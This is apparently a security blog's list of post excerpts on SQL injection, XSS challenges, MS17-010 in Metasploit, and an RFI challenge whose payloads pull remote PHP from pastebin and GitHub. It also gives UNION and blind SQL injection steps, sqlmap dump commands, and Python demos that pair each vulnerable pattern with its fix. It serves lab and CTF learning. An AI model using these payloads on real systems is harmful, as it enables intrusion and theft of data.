Category: Information Security

  • Notes on Web Security Course: analysis and exploitation of SQL injection vulnerabilities

    Time:2020-3-28

    3-1 SQL language foundation. 3-2 ACCESS manual injection. What `and 1=1` means: it is sent to the database as part of the query to check whether the parameter is evaluated as SQL, i.e. whether an injection point exists. `exists (select * from admin)`: a query that tests whether the admin table exists. 3-6 MySQL manual injection. In a logical expression `and` takes precedence over `or`. Sqlmap installation and setup. If uppercase is the […]

  • MS17 in MSF

    Time:2020-3-27

    1. auxiliary/scanner/smb/smb_ms17_010: the auxiliary module that checks whether the MS17-010 vulnerability is present. The scan results showed hosts 2, 3 and 4 as vulnerable. 2. auxiliary/admin/smb/ms17_010_command: against the online hosts with port 445 open that were found vulnerable to MS17-010, exploits the 445/SMB […]

  • 7 common XSS

    Time:2020-3-26

    1. URL reflection. We can add our own XSS vector/payload when the URL is reflected somewhere in the page source. For PHP pages, a slash (/) after the script name lets you append anything to the URL path: http://brutelogic.com.br/xss.php/">   The leading "> is needed to close the current tag in order […]

  • Multi Reflection (Pro Only)

    Time:2020-3-25

    Case 14 – Double Injection in HTML Context with Double Quotes
    https://brutelogic.com.br/multi/double-html.php?p="
    Case 15 – Double Injection in Mixed Context (HTML + JS) with Default Quotes
    https://brutelogic.com.br/multi/double-mixed.php?p="
    Case 16 – Quoteless Inline Double Injection in JS variables
    https://brutelogic.com.br/multi/js-inline.php?p=;alert(1)//\
    Case 17 – Quoteless Inline Double Injection in JS object
    https://brutelogic.com.br/multi/js-object.php?p=};alert(1)//\
    Case […]

  • DOM-based XSS Test Cases

    Time:2020-3-24

    Case 23 – DOM Injection via URL parameter (by server + client)
    https://brutelogic.com.br/dom/dom.php?p=Hello.
    https://brutelogic.com.br/dom/dom.php?p=
    Case 24 – DOM Injection via URL Parameter (Document Sink)
    https://brutelogic.com.br/dom/sinks.html?name=KNOXSS'
    https://brutelogic.com.br/dom/sinks.html?name=
    Case 25 – DOM Injection via Open Redirection (Location Sink)
    https://brutelogic.com.br/dom/sinks.html?redir=javascript:alert(1)
    Case 26 – DOM Injection via URL Parameter (Execution Sink)
    https://brutelogic.com.br/dom/sinks.html?index='NASDAQ'
    https://brutelogic.com.br/dom/sinks.html?index='NASDAQ';alert(1);
    Reference resources: […]
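    The three reflection contexts exercised by the cases above (the attribute breakout with `">` of Case 14, the quoteless `;alert(1)//\` double injection into JS string literals of Case 16, and the location sink of Case 25) as an added example that is not code from brutelogic.com.br or from these posts. It is written in Python rather than PHP/JavaScript to match the page's other example: the `render_*_vulnerable` functions are hypothetical stand-ins for the vulnerable pages, the `render_*_safe` functions apply the encoding that fits each context, `js_code_outside_strings` is a deliberately tiny scanner used only to show which part of the rendered script an engine would execute as code, and `allowed_hosts` is an assumption to be filled in per site.

```python
import html
import json
from urllib.parse import urlsplit

# Constructed payloads in the style of the cases above (the pages' own markup is not reproduced).
PAYLOAD_ATTR = '"><svg/onload=alert(1)>'   # closes value="..." and the tag, then adds its own
PAYLOAD_JS = ';alert(1)//\\'               # no quotes at all; relies on being reflected twice


def render_attr_vulnerable(p: str) -> str:
    # Hypothetical page: parameter pasted into an attribute without encoding.
    return f'<input name="p" value="{p}">'


def render_attr_safe(p: str) -> str:
    # quote=True turns " into &quot;, so the attribute cannot be closed early.
    return f'<input name="p" value="{html.escape(p, quote=True)}">'


def render_js_vulnerable(p: str) -> str:
    # Hypothetical page: the same parameter reflected into two JS string literals.
    # With ;alert(1)//\ the trailing backslash swallows the first closing quote, so the
    # first literal runs on to the opening quote of the second reflection and alert(1)
    # ends up outside any string; the // comments out what remains of the line.
    return f"<script>var a = '{p}'; var b = '{p}';</script>"


def render_js_safe(p: str) -> str:
    # JSON is valid JS: json.dumps escapes backslash and double quote; encoding < as \u003c
    # keeps </script> from ever appearing inside the literal.
    lit = json.dumps(p).replace("<", "\\u003c")
    return f"<script>var a = {lit}; var b = {lit};</script>"


def js_code_outside_strings(src: str) -> str:
    # Tiny scanner (not a JS parser): drops '...'/"..." literals, honouring backslash
    # escapes, and // line comments, leaving the text an engine would treat as code.
    out, i, n = [], 0, len(src)
    while i < n:
        c = src[i]
        if c in "'\"":
            i += 1
            while i < n and src[i] != c:
                i += 2 if src[i] == "\\" else 1
            i += 1
        elif src.startswith("//", i):
            nl = src.find("\n", i)
            i = n if nl == -1 else nl
        else:
            out.append(c)
            i += 1
    return "".join(out)


def is_safe_redirect(target: str, allowed_hosts=()) -> bool:
    # Allowlist for a location sink (Case 25): a site-relative absolute path is fine; an
    # absolute URL only if it is http(s) to a host in allowed_hosts (assumption, fill in).
    # javascript:, data:, vbscript: and scheme-relative //host all fall through to False.
    u = urlsplit(target.strip())
    if u.scheme:
        return u.scheme in ("http", "https") and (u.hostname or "") in allowed_hosts
    return not u.netloc and u.path.startswith("/") and not u.path.startswith("//")


if __name__ == "__main__":
    print("attr vulnerable:", render_attr_vulnerable(PAYLOAD_ATTR))
    print("attr safe:      ", render_attr_safe(PAYLOAD_ATTR))
    for label, page in (("js vulnerable", render_js_vulnerable(PAYLOAD_JS)),
                        ("js safe", render_js_safe(PAYLOAD_JS))):
        print(f"{label}: code part = {js_code_outside_strings(page)!r}")
    for t in ("/account", "javascript:alert(1)", "//evil.example/", "https://brutelogic.com.br/dom/"):
        print(f"{t!r}: safe={is_safe_redirect(t, allowed_hosts=('brutelogic.com.br',))}")
```

    The point of the scanner output is that the vulnerable double reflection leaves `;alert(1)` outside every string literal even though the payload contains no quote of its own, while the JSON-encoded form keeps both reflections inside their literals. `html.escape` is right for HTML text and attribute values only; URL and JS contexts each need their own encoder, and a location sink needs an allowlist rather than encoding.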

  • RFI to RCE challenge

    Time:2020-3-23

    http://www.zixem.altervista.org/RCE/level1.php
    Construct the payload:
    https://zixem.altervista.org/RCE/level1.php?page=https://raw.githubusercontent.com/pipter/SRE/master/test.php
    https://zixem.altervista.org/RCE/level1.php?page=http://pastebin.com/raw.php?i=DDSuhHcu
    https://zixem.altervista.org/RCE/level1.php?page=http://@pastebin.com/raw.php?i=DDSuhHcu

  • XSS Challenges xss-quiz.int21h.jp

    Time:2020-3-22

    Summary: https://xss-quiz.int21h.jp/   Stage #1 payload: alert(document.domain);   Stage #2 http://xss-quiz.int21h.jp/stage2.php?sid=e93e71eed43c3ab5668af6a5aa603cf66eedce70 Tried alert(document.domain); without success because the input field's attribute is not closed; payload: ">   Stage #3 http://xss-quiz.int21h.jp/stage-3.php?sid=d362dd49b96c30f3e9a4a6ea0abafb0cef59ed2d Note: all of these are POST requests; the p1 parameter is not injectable but the p2 parameter is, so the request has to be intercepted and modified. ;javascript:alert(document.domain);//   p2=alert(document.domain);   Stage #4 http://xss-quiz.int21h.jp/stage_4.php?sid=d47663090ecc0b8d55ae73ee3753ead52c63103e p3 is a hidden […]

  • Challenges-XSS

    Time:2020-3-21

    https://alf.nu/alert1 levels: warmup, adobe, JSON

  • Google XSS Challenge

    Time:2020-3-20

    https://xss-game.appspot.com/level1 payload:   https://xss-game.appspot.com/level2 filters out keywords

  • Vulnerability test of manual injection after SQL filtering characters (question 1)

    Time:2020-3-18

    https://www.mozhe.cn/bug/detail/a1diUUZsa3ByMkgrZnpjcWZOYVEyUT09bW96aGUmozhe
    Analysis: this challenge is a time-based blind injection. For this kind of case the usual approach is to point sqlmap at it directly, because extracting data by hand through a time-based oracle is far too laborious.
    sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment --current-db
    sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup --tables
    sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup -T stormgroup_member --columns
    sqlmap -u […]

  • SQL injection penetration practice

    Time:2020-3-17

    Summary:
    Determine the injection point:
    http://www.xxxxx.com/page.php?pid=42 and 1=1 #true
    http://www.xxxxx.com/page.php?pid=42 and 1=2 #false
    Find the number of columns in the query (ORDER BY n fails once n exceeds the column count):
    http://www.xxxxx.com/page.php?pid=42 +ORDER+BY+06 #true
    http://www.xxxxx.com/page.php?pid=42 +ORDER+BY+07 #false
    Find which columns are displayed (the negative pid empties the real result so only the UNION row is shown):
    http://www.xxxxx.com/page.php?pid=-42 +UNION+ALL+SELECT+1,2,3,4,5,6
    Dump database information (0x203a20 is the string " : " written as hex so that no quotes are needed):
    http://www.xxxxx.com/page.php?pid=-42 +UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5,6
    List the tables of the current database (0x3c62723e is "<br>"):
    http://www.xxxxx.com/page.php?pid=-42 +UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),3,4,5,6
    List the columns of a table (0x74626c5f7573657273 is "tbl_users"):
    http://www.xxxxx.com/page.php?pid=-42 +UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x74626c5f7573657273),3,4,5,6
    Get field […]
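    The whole methodology of this post, together with the `and 1=1` injection-point test and the `and`-before-`or` precedence rule from the Web Security Course notes and the character-by-character blind extraction that the Mozhe post hands to sqlmap, run end to end as an added example that is not code from any of these posts. It targets an in-memory SQLite database with a constructed, hypothetical schema (`news`, `tbl_users`) instead of the MySQL sites above: `sqlite_master` and `pragma_table_info()` stand in for `INFORMATION_SCHEMA.TABLES`/`COLUMNS`, string separators are quoted because SQLite reads `0x3c62723e` as an integer rather than a string, and since SQLite has no `SLEEP()` the blind loop is boolean-based (the oracle is row-or-no-row) rather than time-based; the search itself is the same.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    # Constructed sample schema standing in for the target site's tables (hypothetical).
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE tbl_users (id INTEGER PRIMARY KEY, name TEXT, password TEXT);
        INSERT INTO news VALUES (1, 'hello'), (2, 'world');
        INSERT INTO tbl_users VALUES (1, 'admin', 's3cret');
    """)
    return db


def vulnerable_lookup(db, pid: str) -> list:
    # page.php?pid=... as the vulnerable site does it: the parameter is pasted into the SQL.
    return db.execute(f"SELECT id, title FROM news WHERE id={pid}").fetchall()


def safe_lookup(db, pid: str) -> list:
    # Hardened form: a bound parameter is compared as data; "42 and 1=1" is just a non-id.
    return db.execute("SELECT id, title FROM news WHERE id=?", (pid,)).fetchall()


def has_injection_point(db) -> bool:
    # "and 1=1" keeps the row and "and 1=2" drops it: the parameter is being evaluated as SQL.
    return bool(vulnerable_lookup(db, "1 and 1=1")) and not vulnerable_lookup(db, "1 and 1=2")


def and_binds_tighter_than_or(db) -> bool:
    # "id=1 or 1=1 and 1=2" parses as id=1 OR (1=1 AND 1=2): one row, not the whole table.
    # Swap the operands and (id=1 AND 1=2) OR 1=1 returns every row.
    return (len(vulnerable_lookup(db, "1 or 1=1 and 1=2")) == 1
            and len(vulnerable_lookup(db, "1 and 1=2 or 1=1")) == 2)


def count_columns(db, limit: int = 20) -> int:
    # ORDER BY n errors out once n exceeds the column count of the original SELECT.
    for n in range(1, limit + 1):
        try:
            vulnerable_lookup(db, f"1 ORDER BY {n}")
        except sqlite3.OperationalError:
            return n - 1
    return limit


def union_dump(db, subquery: str) -> str:
    # A negative id empties the real result so the UNIONed row is the only thing displayed;
    # column 2 (title) is the one the page renders, so the subquery goes there.
    rows = vulnerable_lookup(db, f"-1 UNION ALL SELECT 1,({subquery})")
    return rows[0][1]


def list_tables(db) -> str:
    # MySQL: INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE(); SQLite: sqlite_master.
    return union_dump(db, "SELECT group_concat(name, '<br>') FROM sqlite_master WHERE type='table'")


def list_columns(db, table: str) -> str:
    # MySQL: INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=...; SQLite: pragma_table_info().
    return union_dump(db, f"SELECT group_concat(name, '<br>') FROM pragma_table_info('{table}')")


def blind_extract(db, subquery: str, maxlen: int = 64):
    # Boolean-based blind extraction: the only signal is whether the row comes back, so each
    # character is recovered by binary search over its code point, about 7 requests per char.
    # (A time-based oracle differs only in measuring delay instead of checking for the row.)
    out, queries = "", 0
    for pos in range(1, maxlen + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            queries += 1
            if vulnerable_lookup(db, f"1 and unicode(substr(({subquery}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # substr() past the end is '' and unicode('') is NULL: never "true"
            break
        out += chr(lo)
    return out, queries


if __name__ == "__main__":
    db = build_db()
    print("injection point:", has_injection_point(db), "| and before or:", and_binds_tighter_than_or(db))
    print("columns:", count_columns(db), "| tables:", list_tables(db), "| tbl_users:", list_columns(db, "tbl_users"))
    print("blind password, queries:", blind_extract(db, "SELECT password FROM tbl_users WHERE name='admin'"))
    print("hardened lookup with payload:", safe_lookup(db, "1 and 1=1"), "| with plain id:", safe_lookup(db, "1"))
```

    The query counter makes the sqlmap remark concrete: a six-character value costs about fifty requests with a boolean oracle, and each of those would be a multi-second wait with a time-based one, which is why the Mozhe post does not do it by hand. The `safe_lookup` calls at the end show the fix: with a bound parameter the same payloads simply match no row.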

  • Win10 DVWA download installation configuration (novice learning penetration)

    Time:2020-3-16

    My computer was reinstalled, so the DVWA penetration-testing lab environment has to be set up again; this is a good opportunity to walk through the DVWA installation process. Machines and environments differ, but by following this tutorial I installed DVWA on my own computer in one go. If you run into […]